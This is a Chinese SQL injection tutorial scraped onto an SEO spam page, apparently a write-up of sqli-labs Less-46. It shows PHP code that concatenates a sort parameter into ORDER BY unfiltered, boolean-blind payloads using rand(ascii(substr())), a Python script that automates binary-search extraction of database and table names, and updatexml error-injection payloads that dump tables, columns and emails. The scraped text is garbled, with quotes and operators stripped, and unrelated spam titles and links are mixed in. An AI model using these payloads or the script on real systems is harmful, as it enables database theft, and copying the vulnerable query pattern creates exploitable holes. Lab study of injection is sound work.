当前位置: 首页 > news >正文

网站的成本衡阳城乡建设部网站首页

news 2025/12/20 19:49:07
网站的成本,衡阳城乡建设部网站首页,vs 网站项目,室内设计联盟官方网站入口什么是order by 在MySQL支持使用ORDER BY语句对查询结果集进行排序处理#xff0c;使用ORDER BY语句不仅支持对单列数据的排序#xff0c;还支持对数据表中多列数据的排序。语法格式如下 select * from 表名 order by 列名(或者数字) asc#xff1b;升序(默认升序) selec…什么是order by 在MySQL支持使用ORDER BY语句对查询结果集进行排序处理使用ORDER BY语句不仅支持对单列数据的排序还支持对数据表中多列数据的排序。语法格式如下 select * from 表名 order by 列名(或者数字) asc升序(默认升序)  select * from 表名 order by 列名(或者数字) desc降序 使用sqli-labs-php7-master环境 在第46关查看源码及打开网页 源代码 !DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd html xmlnshttp://www.w3.org/1999/xhtml head meta http-equivContent-Type contenttext/html; charsetutf-8 / titleORDER BY-Error-Numeric/title /headbody bgcolor#000000 div style margin-top:70px;color:#FFF; font-size:23px; text-align:centerWelcomenbsp;nbsp;nbsp;font color#FF0000 Dhakkan /fontbr font size3 color#FFFF00?php include(../sql-connections/sqli-connect.php); $id$_GET[sort]; if(isset($id)){//logging the connection parameters to a file for analysis.$fpfopen(result.txt,a);fwrite($fp,SORT:.$id.\n);fclose($fp);$sql SELECT * FROM users ORDER BY $id;$result mysqli_query($con1, $sql);if ($result){?centerfont color #00FF00 size4table border1trthnbsp;IDnbsp;/ththnbsp;USERNAMEnbsp; /ththnbsp;PASSWORDnbsp; /th/tr/font/font?phpwhile ($row mysqli_fetch_assoc($result)){echo font color #00FF11 size3; echo tr;echo td.$row[id]./td;echo td.$row[username]./td;echo td.$row[password]./td;echo /tr;echo /font;} echo /table;}else{echo font color #FFFF00;print_r(mysqli_error($con1));echo /font; }} else{echo Please input parameter as SORT with numeric valuebrbrbrbr;echo brbrbr;echo img src../images/Less-46.jpg /br;echo Lesson Concept and code Idea by bD4rk/b;} ?/font /div/br/br/br/center /body /html通过审计代码得知是通过stor进行数据的接收 然后将接收到的数据拼接为一个payload 其中代码中没有做任何的过滤和闭合 在前端网页中尝试发送数据查看具体的效果 通过上传数据可以看到是根据输入的字段进行排序的 我们知道order by可以根据字段或者数值 并且我们可以看到前端页面根据排序的数值不同会出现不同的变化 可见我们确实能通过布尔盲注来进行注入 我们需要使用到这些函数 首先可以使用select database()找到库名 接着我们可以使用substr()将库名的字符一个一个的截取出来 我们可以通过ascii()函数将数据库名的每个字母转为ascii码 接着使用rand()函数进行布尔判断 rand()函数可以产生一个随机值但是如果我们给rand()函数中添加一个值那么rand()产生的值将是固定的例如 所以我们可以利用rand()函数的这个特性进行布尔盲注 具体怎么做呢 我们根据上面的方法具体可以将payload写为这样 ?sortrand(ascii(substr((select database()),1,1))114) 具体意思是找到库名将库名的第一个字母截取出来然后转为ascii码然后进行真假判断根据真假生成随机数 我们之前看到真或假前端页面会出现变化所以我们就可以通过不断的尝试来验证我们的猜想 我们可以看到当它真的小于115的时候页面没有任何变化当他大于115为假的时候它的页面出现了变化所以我们现在就可以确定库名的第一个字母ascii的值为115通过对比ascii表我们就可以得出第一个字母为s以此类推我们可以得出库名表名等等 但是这也太麻烦了 纯手工显得我们比较呆我们可以使用python写一个脚本让脚本帮我们跑   import requests import time #这里需要下载一下beautifulsoup的库 #可以在pycharm中的terminal终端界面中输入pip install beautifulsoup4 from bs4 import BeautifulSoup 查表名 查列名 查具体字段内容 if(ascii(substr(database(),1,1))100,%20sleep(3),%200)-- if(ascii(substr(database(),1,1))110, sleep(3), 0) def inject_database(url):使用二分法查询 aaaaaaaaaaaaaaaaaaaaname for i in range(1, 50):#这里是猜的因为我们不知道库名的长度如果报表名可以更长随便写low 32 #asc从32开始到128结束high 128mid (low high) // 2 while low high:# 爆库名payload rand(ascii(substr((select database()),%d,1))%d) % (i, mid)# 爆表名#payload rand(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema database()), %d, 1))%d) % (i, mid)# 将payload作为参数传递给请求params {sort: payload}# start_time time.time()# 发送一个GET请求到指定的URL带上构造好的参数r requests.get(url, paramsparams)# 获取请求得到的HTML响应内容html r.text# 使用BeautifulSoup解析HTML内容soup BeautifulSoup(html, html.parser)# 从HTML中找到第二个td标签并获取其文本内容这似乎是用来获取用户名getusername soup.find_all(td)[1].text# end_time time.time()# 检查获取的用户名是否为admin3如果是则更新low的值if getusername admin3:low mid 1# 如果获取的用户名不是admin3则更新high的值else:high mid# 更新中间值继续二分查找mid (low high) // 2if mid 32:break# 将找到的字符添加到name中name chr(mid)# 打印出当前已经找到的数据库名称print(name)if __name__ __main__:url http://127.0.0.1/sqli-labs-php7-master/less-46/inject_database(url) 这样就方便多了比如说爆库名 爆表名 如果你仔细看过代码你会发现其实可以使用报错注入 ?sortupdatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),0x5e),1) ?sortupdatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameemails),0x5e),1) 爆数据   ?sortupdatexml(1,concat(0x5e,(select substr(email_id,1,32) from emails limit 1 offset 0),0x5e),1) limit用来限制显示的行数        offset用来限制显示第几行默认从0开始
http://www.pierceye.com/news/581092/

相关文章:

  • html网站制作答辩ppt网站备份和备案的区别
  • 网站开发需要工具免费的ps软件
  • 常州网站建设优质商家重庆互联网怎么样
  • 做网站发广告动漫网页设计报告
  • 求职招聘网站建设投标书沈阳网站建设的公司哪家好
  • 做导航网站有发展吗南京企业网站制作哪家好
  • 千万pv网站开发成本招聘网站数建设
  • 吐鲁番大型网站建设平台找客户去哪个平台
  • 权威网站有哪些给个网站可以在线
  • 优化网站专题北京海淀网站建设公司
  • 广州网站快速排名网站维护正常要多久
  • 建网站 选安全甘肃做网站价格
  • 微信公众管理平台有必要买优化大师会员吗
  • 家居网站建设素材腾讯adq广告平台
  • 响应式网站 图片居中门户网站样式
  • 潍坊网站排名推广北京建设高端网站的
  • 广东省住房和建设网站鹤壁市建设局网站
  • 北京网站建设报价明细手机网站网站开发流程
  • 三合一网站模板如何看网站是html几代做的
  • 如何设置自己的网站网站建设的常用词
  • 甘肃网站开发冷色调网站
  • 用cdr做网站设计尺寸要多少网站如何做实名验证码
  • 比较好的设计网站wordpress主题代码哪里
  • 专门学习网站建设读什么专业南山网站设计公司
  • 专业网站设计模板深圳最专业的高端网站建设
  • cc域名做网站怎么样无锡个人网站建设
  • 网站模板设计报价单小学网站建设设计方案
  • 二级域名网站怎么投广告wordpress自定义输入
  • su域名注册如何做360网站优化
  • 企业网站空间不足怎么办incapsula wordpress